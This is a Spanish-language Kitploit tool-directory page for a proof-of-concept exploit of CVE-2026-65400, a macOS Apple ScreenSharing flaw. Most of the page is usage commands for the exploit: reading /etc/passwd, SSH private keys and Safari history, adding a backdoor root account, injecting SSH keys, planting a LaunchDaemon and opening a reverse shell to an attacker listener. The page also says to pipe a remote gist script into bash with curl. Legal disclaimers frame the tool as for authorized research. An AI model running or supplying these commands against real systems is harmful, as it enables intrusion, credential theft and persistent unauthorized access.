Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/horkimhab/cve-2026-65400
Escalada de PrivilegiosMecanismos de PersistenciaExplotaciónPost-ExplotaciónAutenticaciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubhorkimhab/cve-2026-65400

CVE-2026-65400

Exploit de prueba de concepto para CVE-2026-65400 que permite lectura/escritura autenticada de archivos, reverse shells y persistencia en macOS mediante Apple ScreenSharing.

Ver RepositorioSitio web
319hace 22 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-65400

Donar

Apoya el mantenimiento de este proyecto con PayPal o escaneando el código QR a continuación.

paypal

Código QR para donar

⚡ Uso Simple

Usa este proyecto únicamente en entornos seguros y autorizados, como:

  • Máquinas virtuales locales
  • Contenedores Docker
  • Entornos de laboratorio aislados
  • Entornos de pruebas de penetración autorizados

Ejemplo de configuración:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

Ejemplo de uso:

root@kitploit:~
# Read a File from Target

# Read /etc/passwd and display it
python3 exploit.py read -u root 192.168.1.100 /etc/passwd

# Read and save to a local file
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -o passwd.txt

# Read a user's file
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Documents/secret.txt

# Write a File to Target

# Write a local file to target
python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt myfile.txt

# Write with specific permissions (0600 for crontab)
python3 exploit.py write -u root 192.168.1.100 /tmp/secret data.txt -m 0600

# Write from stdin
echo "hello world" | python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt -

# Get a Reverse Shell (SIP Disabled Only)

# On your attacker machine, start a listener in another terminal
nc -nlvp 4444

# Run the exploit
python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444
# Where:
#   192.168.1.100 = target Mac IP
#   192.168.1.50  = your attacker IP
#   4444          = port for reverse shell

# Example 1: Reading System Files
# Read the shadow file (if accessible)
python3 exploit.py read -u root 192.168.1.100 /var/db/dslocal/nodes/Default/users/admin.plist -o admin.plist

# Read Safari history
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Library/Safari/History.db -o history.db

# Read SSH keys (if they exist)
python3 exploit.py read -u root 192.168.1.100 /Users/admin/.ssh/id_rsa -o id_rsa

# Example 2: Writing Files

# Create a backdoor user
echo "backdoor:*:0:0:Backdoor:/var/root:/bin/bash" > backdoor.txt
python3 exploit.py write -u root 192.168.1.100 /private/etc/passwd backdoor.txt

# Inject SSH key
python3 exploit.py write -u root 192.168.1.100 /Users/admin/.ssh/authorized_keys ~/.ssh/id_rsa.pub

# Write a startup script
python3 exploit.py write -u root 192.168.1.100 /Library/LaunchDaemons/com.backdoor.plist backdoor.plist

# Example 3: SIP Detection

python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444

# Output if SIP is enabled:
# [!] SIP is enabled - crontab injection will fail
# [!] Try using the read/write commands instead

# Output if SIP is disabled:
# [*] SIP is disabled - proceeding with RCE
# [+] Wrote shell script to /var/tmp/.r
# [+] Wrote crontab to /var/at/tabs/root
# [*] Reverse shell should connect to 192.168.1.50:4444 within 60 seconds

# Authentication Bypass Retry
# Increase retry count if it fails
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -r 50

# Port Specification

python3 exploit.py read -u root 192.168.1.100 /etc/passwd -p 5901

Nota:

  • Si clonas desde otro proyecto, debes ejecutar curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y para limpiar el .git del directorio anidado.
  • p. ej.: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Crédito o Referencia

  • https://warez.sl0p.foo/apple-screensharing-rce/
  • https://blog.calif.io/p/no-country-for-old-passwords

📚 Repositorio Educativo de Investigación en Seguridad

Un repositorio para aprender, probar e investigar conceptos de ciberseguridad en entornos controlados.


⚠️ Aviso Legal y de Seguridad

Propósito

Este repositorio es solo para investigación de seguridad educativa y autorizada.

Está diseñado para ayudar a los usuarios a aprender sobre:

  • Vulnerabilidades de seguridad
  • Conceptos de sandbox y aislamiento
  • Prácticas de codificación segura y defensivas

Uso Solo Autorizado

Usa este repositorio únicamente en entornos donde tengas permiso, como:

  • Laboratorios personales o máquinas virtuales
  • Entornos Docker o aislados
  • Pruebas de penetración autorizadas
  • Formación en ciberseguridad o investigación académica

El uso no autorizado o ilegal está estrictamente prohibido.


Sin Responsabilidad

El autor y los colaboradores no son responsables de ningún daño, uso indebido, problema legal o pérdida causada por este proyecto.

Al usar este repositorio, aceptas que:

  • Eres responsable de tus propias acciones
  • Lo usarás de forma legal y ética
  • El proyecto se proporciona sin garantía

Uso Ético

Este proyecto está destinado a:

  • Investigación de seguridad defensiva
  • Educación en ciberseguridad
  • Concienciación sobre vulnerabilidades
  • Investigación de sistemas y software seguros

Por favor, sigue las prácticas de divulgación responsable y cumple con todas las leyes aplicables.


Contacto

Para divulgación responsable o colaboración, contacta con el mantenedor del repositorio a través de GitHub.


Proyecto Relacionado

Explora la Colección de PoC de CVE para obtener recursos adicionales de prueba de concepto de CVE destinados a la investigación y educación de seguridad autorizadas.

Descargar herramienta